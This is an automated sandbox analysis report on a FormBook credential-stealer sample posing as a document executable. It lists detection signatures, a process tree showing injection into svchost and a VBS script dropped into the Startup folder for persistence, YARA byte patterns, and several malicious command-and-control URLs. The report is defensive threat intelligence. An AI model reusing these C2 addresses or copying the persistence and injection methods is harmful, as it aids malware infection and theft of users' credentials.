Edit tour

Windows Analysis Report
Document TOP19928.exe

Overview

General Information

Sample name:	Document TOP19928.exe
Analysis ID:	1462990
MD5:	9503c5e38cc3212777d0f35ad86ad949
SHA1:	91e513f38310ec35b6568ab78db72e07baac8e80
SHA256:	76e1f3e24e580448102173c64147b51e13834fba66c34ed3e273e5b54c895fe5
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Document TOP19928.exe (PID: 3436 cmdline: "C:\Users\user\Desktop\Document TOP19928.exe" MD5: 9503C5E38CC3212777D0F35AD86AD949)

name.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\Document TOP19928.exe" MD5: 9503C5E38CC3212777D0F35AD86AD949)

svchost.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\Document TOP19928.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

HAeLffQrBWbBcOffDKoNxdCPr.exe (PID: 5840 cmdline: "C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 2504 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

HAeLffQrBWbBcOffDKoNxdCPr.exe (PID: 7152 cmdline: "C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5804 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

wscript.exe (PID: 5776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

name.exe (PID: 1848 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9503C5E38CC3212777D0F35AD86AD949)

svchost.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed2e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x183cd:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x33d21f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3268be:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x33d21f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3268be:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5776, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Document TOP19928.exe", CommandLine: "C:\Users\user\Desktop\Document TOP19928.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Document TOP19928.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 6036, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\Document TOP19928.exe", ProcessId: 3624, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5776, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Document TOP19928.exe", CommandLine: "C:\Users\user\Desktop\Document TOP19928.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Document TOP19928.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 6036, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\Document TOP19928.exe", ProcessId: 3624, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 6036, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.empowermedeco.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?Y8F=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&9brL_=BThPe0S0	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/?Y8F=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBSD8DGilcFUIaw9KGDa8hSIpxJ4Da6NkwMKTsgVvIjwNNkg==&9brL_=BThPe0S0	Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?Y8F=mxnR	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?Y8F=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrINr9TZW+RNBVQYBQJyEcpoFJRXOlD4bLupvYs9MkX8JY0Q==&9brL_=BThPe0S0	Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?Y8F=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&9brL_=BThPe0S0	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?Y8F=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8tsmJ5wYjg7yHR75gTEM7bFlUHlp6xhVA3OjEJ21e5ZGGZA==&9brL_=BThPe0S0	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: empowermedeco.com	Virustotal: Detection: 11%	Perma Link
Source: www.660danm.top	Virustotal: Detection: 10%	Perma Link
Source: www.kasegitai.tokyo	Virustotal: Detection: 7%	Perma Link
Source: elettrosistemista.zip	Virustotal: Detection: 10%	Perma Link
Source: www.antonio-vivaldi.mobi	Virustotal: Detection: 9%	Perma Link
Source: www.shenzhoucui.com	Virustotal: Detection: 9%	Perma Link
Source: www.3xfootball.com	Virustotal: Detection: 5%	Perma Link
Source: www.donnavariedades.com	Virustotal: Detection: 8%	Perma Link
Source: www.b301.space	Virustotal: Detection: 6%	Perma Link
Source: www.magmadokum.com	Virustotal: Detection: 9%	Perma Link
Source: www.rssnewscast.com	Virustotal: Detection: 6%	Perma Link
Source: www.techchains.info	Virustotal: Detection: 10%	Perma Link
Source: www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link
Source: www.elettrosistemista.zip	Virustotal: Detection: 7%	Perma Link
Source: www.k9vyp11no3.cfd	Virustotal: Detection: 8%	Perma Link
Source: www.goldenjade-travel.com	Virustotal: Detection: 9%	Perma Link
Source: http://www.empowermedeco.com/fo8o/	Virustotal: Detection: 8%	Perma Link
Source: http://www.660danm.top/fo8o/	Virustotal: Detection: 10%	Perma Link
Source: http://www.rssnewscast.com/fo8o/	Virustotal: Detection: 6%	Perma Link
Source: http://www.magmadokum.com/fo8o/	Virustotal: Detection: 9%	Perma Link
Source: http://www.kasegitai.tokyo	Virustotal: Detection: 7%	Perma Link
Source: http://www.kasegitai.tokyo/fo8o/	Virustotal: Detection: 11%	Perma Link
Source: http://www.shenzhoucui.com/fo8o/	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: Document TOP19928.exe	Virustotal: Detection: 65%			Perma Link
Source: Document TOP19928.exe	ReversingLabs: Detection: 71%

Yara detected FormBook

Source: Yara match	File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Document TOP19928.exe

Joe Sandbox ML: detected

Source: Document TOP19928.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477093923.0000000000DBE000.00000002.00000001.01000000.00000005.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000000.2253854673.0000000000DBE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2022470465.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2026449015.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2167849289.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2077285315.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2167849289.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2074987804.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2171018368.0000000003208000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.00000000033B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.000000000354E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2167126471.0000000003056000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000007.00000003.2163353452.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000007.00000003.2162748029.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2228385577.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2224307956.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2022470465.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2026449015.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.2167849289.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2077285315.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2167849289.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2074987804.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2171018368.0000000003208000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.00000000033B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.000000000354E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2167126471.0000000003056000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000007.00000003.2163353452.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000007.00000003.2162748029.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2228385577.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2224307956.0000000003200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000003.00000002.2167710865.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2135727420.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477269570.0000000000E08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.4478683134.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4476837746.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2468447936.00000000139FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.4478683134.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4476837746.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2468447936.00000000139FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000003.00000002.2167710865.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2135727420.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477269570.0000000000E08000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00834696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00834696
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0083C9C7
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083C93C FindFirstFileW,FindClose,	0_2_0083C93C
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0083F200
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0083F35D
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0083F65E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00833A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00833A2B
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00833D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00833D4E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0083BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0083BF27

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
